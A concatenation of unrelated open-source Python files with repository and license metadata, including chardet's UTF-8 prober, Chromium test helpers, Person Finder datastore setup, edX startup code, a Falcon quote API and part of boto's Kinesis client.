self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
self.ax.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
else:
plt.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
plt.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
plt.figure(1).canvas.draw()
def data_gen(self):
#self.ax.cla()
for regionName,regionPoly in self.map.iteritems():
self.plotPoly(regionPoly,'k')
"""
#for i in range(len(self.V)):
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.plotPoly(self.realRobot, 'r')
self.plotPoly(self.robot, 'b')
"""
pose = self.pose_handler.getPose()
self.ax.plot(pose[0],pose[1],'bo')
"""
self.ax.plot(self.q_g[0],self.q_g[1],'ro')
self.plotPoly(self.overlap,'g')
self.plotPoly(self.m_line,'b')
"""
yield(pose[0],pose[1])
"""
self.ax.plot(self.prev_follow[0],self.prev_follow[1],'ko')
"""
def jplot(self):
ani = animation.FuncAnimation(self.fig, self.scope.update, self.data_gen)
plt.show()
class _Scope:
def __init__(self, ax, motion, maxt=2, dt=0.02):
self.i = 0
self.ax = ax
self.line, = self.ax.plot(1)
self.ax.set_ylim(0, 1)
self.motion = motion
def update(self,data):
(data1) = self.motion.data_gen()
a = data1.next()
self.line.set_data(a)
self.ax.relim()
self.ax.autoscale()
return self.line,
|
gpl-3.0
|
pechatny/basic-flask-app
|
src/app/flask/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/utf8prober.py
|
2919
|
2652
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from . import constants
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == constants.eError:
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
|
mit
|
yinquan529/platform-external-chromium_org
|
chrome/test/pyautolib/plugins_info.py
|
69
|
3510
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Python representation for Chromium Plugins info.
This is the info available at about:plugins.
Obtain one of these from PyUITestSuite::GetPluginsInfo() call.
Example:
class MyTest(pyauto.PyUITest):
def testBasic(self):
info = self.GetPluginsInfo() # fetch plugins snapshot
print info.Plugins()
See more examples in chrome/test/functional/plugins.py.
"""
import simplejson as json
from pyauto_errors import JSONInterfaceError
class PluginsInfo(object):
"""Represent info for Chromium plugins.
The info is represented as a list of dictionaries, one for each plugin.
"""
def __init__(self, plugins_dict):
"""Initialize a PluginsInfo from a json string.
Args:
plugins_dict: a dictionary returned by the automation command
'GetPluginsInfo'.
Raises:
pyauto_errors.JSONInterfaceError if the automation call returns an error.
"""
# JSON string prepared in GetPluginsInfo() in automation_provider.cc
self.pluginsdict = plugins_dict
if self.pluginsdict.has_key('error'):
raise JSONInterfaceError(self.pluginsdict['error'])
def Plugins(self):
"""Get plugins.
Returns:
a list of plugins info
Sample:
[ { u'desc': u'Shockwave Flash 10.0 r45',
u'enabled': True,
u'mimeTypes': [ { u'description': u'Shockwave Flash',
u'fileExtensions': [u'swf'],
u'mimeType': u'application/x-shockwave-flash'},
{ u'description': u'FutureSplash Player',
u'fileExtensions': [u'spl'],
u'mimeType': u'application/futuresplash'}],
u'name': u'Shockwave Flash',
u'path': u'/Library/Internet Plug-Ins/Flash Player.plugin',
u'version': u'10.0.45.2'},
{ u'desc': u'Version 1.1.2.9282',
u'enabled': True,
u'mimeTypes': [ { u'description': u'Google voice and video chat',
u'fileExtensions': [u'googletalk'],
u'mimeType': u'application/googletalk'}],
u'name': u'Google Talk NPAPI Plugin',
u'path': u'/Library/Internet Plug-Ins/googletalkbrowserplugin.plugin',
u'version': u'1.1.2.9282'},
...,
...,
]
"""
return self.pluginsdict.get('plugins', [])
def PluginForPath(self, path):
"""Get plugin info for the given plugin path.
Returns:
a dictionary of info for the plugin.
"""
got = filter(lambda x: x['path'] == path, self.Plugins())
if not got: return None
return got[0]
def PluginForName(self, name):
"""Get plugin info for the given name.
There might be several plugins with the same name.
Args:
name: the name for which to look for.
Returns:
a list of info dictionaries for each plugin found with the given name.
"""
return filter(lambda x: x['name'] == name, self.Plugins())
def FirstPluginForName(self, name):
"""Get plugin info for the first plugin with the given name.
This is useful in case there are multiple plugins for a name.
Args:
name: the name for which to look for.
Returns:
a plugin info dictionary
None, if not found
"""
all = self.PluginForName(name)
if not all: return None
return all[0]
|
bsd-3-clause
|
vmamidi/trafficserver
|
tests/gold_tests/cont_schedule/thread_affinity.test.py
|
6
|
1791
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
Test.Summary = 'Test TSContThreadAffinity APIs'
Test.ContinueOnFail = True
# Define default ATS
ts = Test.MakeATSProcess('ts')
Test.testName = 'Test TSContThreadAffinity APIs'
ts.Disk.records_config.update({
'proxy.config.exec_thread.autoconfig': 0,
'proxy.config.exec_thread.autoconfig.scale': 1.5,
'proxy.config.exec_thread.limit': 32,
'proxy.config.accept_threads': 1,
'proxy.config.task_threads': 2,
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'TSContSchedule_test'
})
# Load plugin
Test.PrepareTestPlugin(os.path.join(Test.Variables.AtsTestPluginsDir, 'cont_schedule.so'), ts, 'affinity')
# www.example.com Host
tr = Test.AddTestRun()
tr.Processes.Default.Command = 'printf "Test TSContThreadAffinity API"'
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.StartBefore(ts)
ts.Streams.All = "gold/thread_affinity.gold"
ts.Streams.All += Testers.ExcludesExpression('fail', 'should not contain "fail"')
|
apache-2.0
|
gauribhoite/personfinder
|
tools/setup_pf.py
|
4
|
8995
|
# Copyright 2009-2010 by Ka-Ping Yee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import const
from model import *
from utils import *
def setup_datastore():
"""Sets up the subject types and translations in a datastore. (Existing
subject types and messages will be updated; existing Subject or Report
information will not be changed or deleted.)"""
setup_repos()
setup_configs()
def wipe_datastore(delete=None, keep=None):
"""Deletes everything in the datastore. If 'delete' is given (a list of
kind names), deletes only those kinds of entities. If 'keep' is given,
skips deleting those kinds of entities."""
query = db.Query(keys_only=True)
keys = query.fetch(1000)
while keys:
db.delete([key for key in keys
if delete is None or key.kind() in delete
if keep is None or key.kind() not in keep])
keys = query.with_cursor(query.cursor()).fetch(1000)
def reset_datastore():
"""Wipes everything in the datastore except Accounts and Secrets,
then sets up the datastore for new data."""
wipe_datastore(keep=['Account', 'Secret'])
setup_datastore()
def setup_repos():
db.put([Repo(key_name='haiti'),
Repo(key_name='japan'),
Repo(key_name='pakistan')])
# Set some repositories active so they show on the main page.
config.set_for_repo('japan', launched=True)
config.set_for_repo('haiti', launched=True)
def setup_configs():
"""Installs configuration settings used for testing by server_tests."""
COMMON_KEYWORDS = ['person', 'people', 'finder', 'person finder',
'people finder', 'crisis', 'survivor', 'family']
# NOTE: the following two CAPTCHA keys are dummy keys for testing only.
# (https://developers.google.com/recaptcha/docs/faq)
# They should be replaced with real keys upon launch.
config.set(captcha_site_key='6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI',
captcha_secret_key='6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe',
# A Google Translate API key with a very low quota, just for testing.
translate_api_key='AIzaSyCXdz9x7LDL3BvieEP8Wcze64CC_iqslSE',
repo_aliases={},
referrer_whitelist=[])
config.set_for_repo(
'haiti',
# Appended to "Google Person Finder" in page titles.
repo_titles={
'en': 'Haiti Earthquake',
'fr': u'S\xe9isme en Ha\xefti',
'ht': u'Tranbleman T\xe8 an Ayiti',
'es': u'Terremoto en Hait\xed'
},
# List of language codes that appear in the language menu.
language_menu_options=['en', 'ht', 'fr', 'es'],
# Content for the <meta name="keywords"> tag.
keywords=', '.join([
'haiti', 'earthquake', 'haiti earthquake', 'haitian',
u'ha\xefti', u's\xe9isme', 'tremblement', 'tremblement de terre',
'famille', 'recherche de personnes', 'terremoto'
] + COMMON_KEYWORDS),
# If false, hide the family_name field and use only given_name.
use_family_name=True,
# Presentation order for the given name and family name.
family_name_first=False,
# If true, show extra fields for alternate names.
use_alternate_names=True,
# If false, hide the home_zip field.
use_postal_code=True,
# Require at least this many letters in each word of a text query.
min_query_word_length=2,
# Show input fields for profile URLs in create page.
show_profile_entry=True,
# Default list of profile websites to show in create page.
profile_websites=const.DEFAULT_PROFILE_WEBSITES,
# Default map viewport for the location field in the note form.
map_default_zoom=7,
map_default_center=[18.968637, -72.284546],
map_size_pixels=[400, 280],
# If true, the feeds and read API require an authorization key.
read_auth_key_required=False,
# If true, the search API requires an authorization key.
search_auth_key_required=False,
# If true, show "believed dead" option in the note status dropdown
allow_believed_dead_via_ui=True,
# Custom html messages to show on main page, results page, view page,
# and query form, keyed by language codes.
start_page_custom_htmls={'en': '', 'fr': ''},
results_page_custom_htmls={'en': '', 'fr': ''},
view_page_custom_htmls={'en': '', 'fr': ''},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
published_date=get_timestamp(datetime(2010, 1, 12)),
updated_date=get_timestamp(datetime(2010, 1, 12)),
)
config.set_for_repo(
'japan',
language_menu_options=['ja', 'en', 'ko', 'zh-CN', 'zh-TW', 'pt-BR', 'es'],
repo_titles={
'en': '2011 Japan Earthquake',
'zh-TW': u'2011 \u65e5\u672c\u5730\u9707',
'zh-CN': u'2011 \u65e5\u672c\u5730\u9707',
'pt-BR': u'2011 Terremoto no Jap\xe3o',
'ja': u'2011 \u65e5\u672c\u5730\u9707',
'es': u'2011 Terremoto en Jap\xf3n'
},
keywords=', '.join(COMMON_KEYWORDS),
use_family_name=True,
family_name_first=True,
use_alternate_names=True,
use_postal_code=True,
min_query_word_length=1,
show_profile_entry=True,
profile_websites=const.DEFAULT_PROFILE_WEBSITES,
map_default_zoom=7,
map_default_center=[38, 140.7],
map_size_pixels=[400, 400],
search_auth_key_required=True,
read_auth_key_required=True,
allow_believed_dead_via_ui=True,
start_page_custom_htmls={'en': 'Custom message', 'fr': 'French'},
results_page_custom_htmls={'en': 'Custom message', 'fr': 'French'},
view_page_custom_htmls={'en': 'Custom message', 'fr': 'French'},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
# NOTE(kpy): These two configuration settings only work for locations
# with a single, fixed time zone offset and no Daylight Saving Time.
time_zone_offset=9, # UTC+9
time_zone_abbreviation='JST',
jp_mobile_carrier_redirect=True,
published_date=get_timestamp(datetime(2011, 3, 11)),
updated_date=get_timestamp(datetime(2011, 3, 11)),
)
config.set_for_repo(
'pakistan',
repo_titles={
'en': 'Pakistan Floods',
'ur': u'\u067e\u0627\u06a9\u0633\u062a\u0627\u0646\u06cc \u0633\u06cc\u0644\u0627\u0628'
},
language_menu_options=['en', 'ur'],
keywords=', '.join([
'pakistan', 'flood', 'pakistan flood', 'pakistani'
] + COMMON_KEYWORDS),
use_family_name=False,
family_name_first=False,
use_alternate_names=False,
use_postal_code=False,
min_query_word_length=1,
map_default_zoom=6,
map_default_center=[33.36, 73.26], # near Rawalpindi, Pakistan
map_size_pixels=[400, 500],
read_auth_key_required=False,
search_auth_key_required=False,
allow_believed_dead_via_ui=True,
start_page_custom_htmls={'en': '', 'fr': ''},
results_page_custom_htmls={'en': '', 'fr': ''},
view_page_custom_htmls={'en': '', 'fr': ''},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
published_date=get_timestamp(datetime(2010, 8, 6)),
updated_date=get_timestamp(datetime(2010, 8, 6)),
)
def setup_lang_test_config():
config.set_for_repo(
'lang-test',
# We set short titles to avoid exceeding the field's 500-char limit.
repo_titles=dict((lang, lang) for lang in const.LANGUAGE_ENDONYMS),
language_menu_options=list(const.LANGUAGE_ENDONYMS.keys()),
keywords=', '.join(COMMON_KEYWORDS),
use_family_name=True,
family_name_first=True,
use_alternate_names=True,
use_postal_code=True,
min_query_word_length=1,
map_default_zoom=6,
map_default_center=[0 ,0],
map_size_pixels=[400, 500],
read_auth_key_required=False,
search_auth_key_required=False,
allow_believed_dead_via_ui=True,
start_page_custom_htmls={'en': '', 'fr': ''},
results_page_custom_htmls={'en': '', 'fr': ''},
view_page_custom_htmls={'en': '', 'fr': ''},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
)
|
apache-2.0
|
MartinEnder/erpnext-de
|
erpnext/selling/doctype/product_bundle/product_bundle.py
|
25
|
1166
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
class ProductBundle(Document):
def autoname(self):
self.name = self.new_item_code
def validate(self):
self.validate_main_item()
from erpnext.utilities.transaction_base import validate_uom_is_integer
validate_uom_is_integer(self, "uom", "qty")
def validate_main_item(self):
"""Validates, main Item is not a stock item"""
if frappe.db.get_value("Item", self.new_item_code, "is_stock_item"):
frappe.throw(_("Parent Item {0} must not be a Stock Item").format(self.new_item_code))
def get_new_item_code(doctype, txt, searchfield, start, page_len, filters):
from erpnext.controllers.queries import get_match_cond
return frappe.db.sql("""select name, item_name, description from tabItem
where is_stock_item=0 and name not in (select name from `tabProduct Bundle`)
and %s like %s %s limit %s, %s""" % (searchfield, "%s",
get_match_cond(doctype),"%s", "%s"),
("%%%s%%" % txt, start, page_len))
|
agpl-3.0
|
Shrhawk/edx-platform
|
lms/startup.py
|
14
|
4770
|
"""
Module for code that should run during LMS startup
"""
# pylint: disable=unused-argument
from django.conf import settings
# Force settings to run so that the python path is modified
settings.INSTALLED_APPS # pylint: disable=pointless-statement
from openedx.core.lib.django_startup import autostartup
import edxmako
import logging
from monkey_patch import django_utils_translation
import analytics
log = logging.getLogger(__name__)
def run():
"""
Executed during django startup
"""
django_utils_translation.patch()
autostartup()
add_mimetypes()
if settings.FEATURES.get('USE_CUSTOM_THEME', False):
enable_theme()
if settings.FEATURES.get('USE_MICROSITES', False):
enable_microsites()
if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):
enable_third_party_auth()
# Initialize Segment.io analytics module. Flushes first time a message is received and
# every 50 messages thereafter, or if 10 seconds have passed since last flush
if settings.FEATURES.get('SEGMENT_IO_LMS') and hasattr(settings, 'SEGMENT_IO_LMS_KEY'):
analytics.init(settings.SEGMENT_IO_LMS_KEY, flush_at=50)
def add_mimetypes():
"""
Add extra mimetypes. Used in xblock_resource.
If you add a mimetype here, be sure to also add it in cms/startup.py.
"""
import mimetypes
mimetypes.add_type('application/vnd.ms-fontobject', '.eot')
mimetypes.add_type('application/x-font-opentype', '.otf')
mimetypes.add_type('application/x-font-ttf', '.ttf')
mimetypes.add_type('application/font-woff', '.woff')
def enable_theme():
"""
Enable the settings for a custom theme, whose files should be stored
in ENV_ROOT/themes/THEME_NAME (e.g., edx_all/themes/stanford).
"""
# Workaround for setting THEME_NAME to an empty
# string which is the default due to this ansible
# bug: https://github.com/ansible/ansible/issues/4812
if settings.THEME_NAME == "":
settings.THEME_NAME = None
return
assert settings.FEATURES['USE_CUSTOM_THEME']
settings.FAVICON_PATH = 'themes/{name}/images/favicon.ico'.format(
name=settings.THEME_NAME
)
# Calculate the location of the theme's files
theme_root = settings.ENV_ROOT / "themes" / settings.THEME_NAME
# Include the theme's templates in the template search paths
settings.TEMPLATE_DIRS.insert(0, theme_root / 'templates')
edxmako.paths.add_lookup('main', theme_root / 'templates', prepend=True)
# Namespace the theme's static files to 'themes/<theme_name>' to
# avoid collisions with default edX static files
settings.STATICFILES_DIRS.append(
(u'themes/{}'.format(settings.THEME_NAME), theme_root / 'static')
)
# Include theme locale path for django translations lookup
settings.LOCALE_PATHS = (theme_root / 'conf/locale',) + settings.LOCALE_PATHS
def enable_microsites():
"""
Enable the use of microsites, which are websites that allow
for subdomains for the edX platform, e.g. foo.edx.org
"""
microsites_root = settings.MICROSITE_ROOT_DIR
microsite_config_dict = settings.MICROSITE_CONFIGURATION
for ms_name, ms_config in microsite_config_dict.items():
# Calculate the location of the microsite's files
ms_root = microsites_root / ms_name
ms_config = microsite_config_dict[ms_name]
# pull in configuration information from each
# microsite root
if ms_root.isdir():
# store the path on disk for later use
ms_config['microsite_root'] = ms_root
template_dir = ms_root / 'templates'
ms_config['template_dir'] = template_dir
ms_config['microsite_name'] = ms_name
log.info('Loading microsite %s', ms_root)
else:
# not sure if we have application logging at this stage of
# startup
log.error('Error loading microsite %s. Directory does not exist', ms_root)
# remove from our configuration as it is not valid
del microsite_config_dict[ms_name]
# if we have any valid microsites defined, let's wire in the Mako and STATIC_FILES search paths
if microsite_config_dict:
settings.TEMPLATE_DIRS.append(microsites_root)
edxmako.paths.add_lookup('main', microsites_root)
settings.STATICFILES_DIRS.insert(0, microsites_root)
def enable_third_party_auth():
"""
Enable the use of third_party_auth, which allows users to sign in to edX
using other identity providers. For configuration details, see
common/djangoapps/third_party_auth/settings.py.
"""
from third_party_auth import settings as auth_settings
auth_settings.apply_settings(settings)
|
agpl-3.0
|
conda/kapsel
|
examples/quote_api/quote.py
|
1
|
4575
|
from argparse import ArgumentParser
import falcon
import gunicorn.app.base
import json
import multiprocessing
import sys
# A Falcon resource that returns the same quote every time
class QuoteResource(object):
def on_get(self, req, resp):
"""Handles GET requests"""
quote = {'quote': 'I\'ve always been more interested in the future than in the past.', 'author': 'Grace Hopper'}
resp.body = json.dumps(quote)
# A Falcon resource that explains what this server is
class IndexResource(object):
def __init__(self, prefix):
self.prefix = prefix
def on_get(self, req, resp):
"""Handles GET requests"""
resp.body = """
<html>
<head>
<title>Quote API Server</title>
</head>
<body>
<p>This is a toy JSON API server example.</p>
<p>Make a GET request to <a href="%s/quote">%s/quote</a></p>
</body>
</html>
""" % (self.prefix, self.prefix)
resp.content_type = "text/html"
resp.status = falcon.HTTP_200
# A Falcon middleware to implement validation of the Host header in requests
class HostFilter(object):
def __init__(self, hosts):
# falcon strips the port out of req.host, even if it isn't 80.
# This is probably a bug in Falcon, so we work around it here.
self.hosts = [falcon.util.uri.parse_host(host)[0] for host in hosts]
def process_request(self, req, resp):
# req.host has the port stripped from what the browser
# sent us, even when it isn't 80, which is probably a bug
# in Falcon. We deal with that in __init__ by removing
# ports from self.hosts.
if req.host not in self.hosts:
print("Attempted request with Host header '%s' denied" % req.host)
raise falcon.HTTPForbidden("Bad Host header", "Cannot connect via the provided hostname")
# the gunicorn application
class QuoteApplication(gunicorn.app.base.BaseApplication):
def __init__(self, port, prefix, hosts):
assert prefix is not None
assert port is not None
self.application = falcon.API(middleware=HostFilter(hosts))
# add_route is pedantic about this
if prefix != '' and not prefix.startswith("/"):
prefix = "/" + prefix
self.application.add_route(prefix + '/quote', QuoteResource())
self.application.add_route(prefix + "/", IndexResource(prefix))
self.port = port
super(QuoteApplication, self).__init__()
print("Only connections via these hosts are allowed: " + repr(hosts))
print("Starting API server. Try http://localhost:%s%s" % (self.port, prefix + '/quote'))
def load_config(self):
# Note that --kapsel-host is NOT this address; it is NOT
# the address to listen on. --kapsel-host specifies the
# allowed values of the Host header in an http request,
# which is totally different. Another way to put it is
# that --kapsel-host is the public hostname:port browsers will
# be connecting to.
self.cfg.set('bind', '%s:%s' % ('0.0.0.0', self.port))
self.cfg.set('workers', (multiprocessing.cpu_count() * 2) + 1)
def load(self):
return self.application
# arg parser for the standard kapsel options
parser = ArgumentParser(prog="quote-api", description="API server that returns a quote.")
parser.add_argument('--kapsel-host', action='append', help='Hostname to allow in requests')
parser.add_argument('--kapsel-no-browser', action='store_true', default=False, help='Disable opening in a browser')
parser.add_argument('--kapsel-use-xheaders',
action='store_true',
default=False,
help='Trust X-headers from reverse proxy')
parser.add_argument('--kapsel-url-prefix', action='store', default='', help='Prefix in front of urls')
parser.add_argument('--kapsel-port', action='store', default='8080', help='Port to listen on')
parser.add_argument('--kapsel-iframe-hosts',
action='append',
help='Space-separated hosts which can embed us in an iframe per our Content-Security-Policy')
if __name__ == '__main__':
# This app accepts but ignores --kapsel-no-browser because we never bother to open a browser,
# and accepts but ignores --kapsel-iframe-hosts since iframing an API makes no sense.
args = parser.parse_args(sys.argv[1:])
if not args.kapsel_host:
args.kapsel_host = ['localhost:' + args.kapsel_port]
QuoteApplication(port=args.kapsel_port, prefix=args.kapsel_url_prefix, hosts=args.kapsel_host).run()
|
bsd-3-clause
|
ychen820/microblog
|
y/google-cloud-sdk/.install/.backup/platform/gsutil/third_party/boto/boto/kinesis/layer1.py
|
10
|
33127
|
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
try:
import json
except ImportError:
import simplejson as json
import base64
import boto
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
from boto.exception import JSONResponseError
from boto.kinesis import exceptions
class KinesisConnection(AWSQueryConnection):
"""
Amazon Kinesis Service API Reference
Amazon Kinesis is a managed service that scales elastically for
real time processing of streaming big data.
"""
APIVersion = "2013-12-02"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "kinesis.us-east-1.amazonaws.com"
ServiceName = "Kinesis"
TargetPrefix = "Kinesis_20131202"
ResponseError = JSONResponseError
_faults = {
"ProvisionedThroughputExceededException": exceptions.ProvisionedThroughputExceededException,
"LimitExceededException": exceptions.LimitExceededException,
"ExpiredIteratorException": exceptions.ExpiredIteratorException,
"ResourceInUseException": exceptions.ResourceInUseException,
"ResourceNotFoundException": exceptions.ResourceNotFoundException,
"InvalidArgumentException": exceptions.InvalidArgumentException,
"SubscriptionRequiredException": exceptions.SubscriptionRequiredException
}
def __init__(self, **kwargs):
region = kwargs.pop('region', None)
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
if 'host' not in kwargs:
kwargs['host'] = region.endpoint
super(KinesisConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def create_stream(self, stream_name, shard_count):
"""
This operation adds a new Amazon Kinesis stream to your AWS
account. A stream captures and transports data records that
are continuously emitted from different data sources or
producers . Scale-out within an Amazon Kinesis stream is
explicitly supported by means of shards, which are uniquely
identified groups of data records in an Amazon Kinesis stream.
You specify and control the number of shards that a stream is
composed of. Each shard can support up to 5 read transactions
per second up to a maximum total of 2 MB of data read per
second. Each shard can support up to 1000 write transactions
per second up to a maximum total of 1 MB data written per
second. You can add shards to a stream if the amount of data
input increases and you can remove shards if the amount of
data input decreases.
The stream name identifies the stream. The name is scoped to
the AWS account used by the application. It is also scoped by
region. That is, two streams in two different accounts can
have the same name, and two streams in the same account, but
in two different regions, can have the same name.
`CreateStream` is an asynchronous operation. Upon receiving a
`CreateStream` request, Amazon Kinesis immediately returns and
sets the stream status to CREATING. After the stream is
created, Amazon Kinesis sets the stream status to ACTIVE. You
should perform read and write operations only on an ACTIVE
stream.
You receive a `LimitExceededException` when making a
`CreateStream` request if you try to do one of the following:
+ Have more than five streams in the CREATING state at any
point in time.
+ Create more shards than are authorized for your account.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
You can use the `DescribeStream` operation to check the stream
status, which is returned in `StreamStatus`.
`CreateStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: A name to identify the stream. The stream name is
scoped to the AWS account used by the application that creates the
stream. It is also scoped by region. That is, two streams in two
different AWS accounts can have the same name, and two streams in
the same AWS account, but in two different regions, can have the
same name.
:type shard_count: integer
:param shard_count: The number of shards that the stream will use. The
throughput of the stream is a function of the number of shards;
more shards are required for greater provisioned throughput.
**Note:** The default limit for an AWS account is two shards per
stream. If you need to create a stream with more than two shards,
contact AWS Support to increase the limit on your account.
"""
params = {
'StreamName': stream_name,
'ShardCount': shard_count,
}
return self.make_request(action='CreateStream',
body=json.dumps(params))
def delete_stream(self, stream_name):
"""
This operation deletes a stream and all of its shards and
data. You must shut down any applications that are operating
on the stream before you delete the stream. If an application
attempts to operate on a deleted stream, it will receive the
exception `ResourceNotFoundException`.
If the stream is in the ACTIVE state, you can delete it. After
a `DeleteStream` request, the specified stream is in the
DELETING state until Amazon Kinesis completes the deletion.
**Note:** Amazon Kinesis might continue to accept data read
and write operations, such as PutRecord and GetRecords, on a
stream in the DELETING state until the stream deletion is
complete.
When you delete a stream, any shards in that stream are also
deleted.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`DeleteStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to delete.
"""
params = {'StreamName': stream_name, }
return self.make_request(action='DeleteStream',
body=json.dumps(params))
def describe_stream(self, stream_name, limit=None,
exclusive_start_shard_id=None):
"""
This operation returns the following information about the
stream: the current status of the stream, the stream Amazon
Resource Name (ARN), and an array of shard objects that
comprise the stream. For each shard object there is
information about the hash key and sequence number ranges that
the shard spans, and the IDs of any earlier shards that played
in a role in a MergeShards or SplitShard operation that
created the shard. A sequence number is the identifier
associated with every record ingested in the Amazon Kinesis
stream. The sequence number is assigned by the Amazon Kinesis
service when a record is put into the stream.
You can limit the number of returned shards using the `Limit`
parameter. The number of shards in a stream may be too large
to return from a single call to `DescribeStream`. You can
detect this by using the `HasMoreShards` flag in the returned
output. `HasMoreShards` is set to `True` when there is more
data available.
If there are more shards available, you can request more
shards by using the shard ID of the last shard returned by the
`DescribeStream` request, in the `ExclusiveStartShardId`
parameter in a subsequent request to `DescribeStream`.
`DescribeStream` is a paginated operation.
`DescribeStream` has a limit of 10 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to describe.
:type limit: integer
:param limit: The maximum number of shards to return.
:type exclusive_start_shard_id: string
:param exclusive_start_shard_id: The shard ID of the shard to start
with for the stream description.
"""
params = {'StreamName': stream_name, }
if limit is not None:
params['Limit'] = limit
if exclusive_start_shard_id is not None:
params['ExclusiveStartShardId'] = exclusive_start_shard_id
return self.make_request(action='DescribeStream',
body=json.dumps(params))
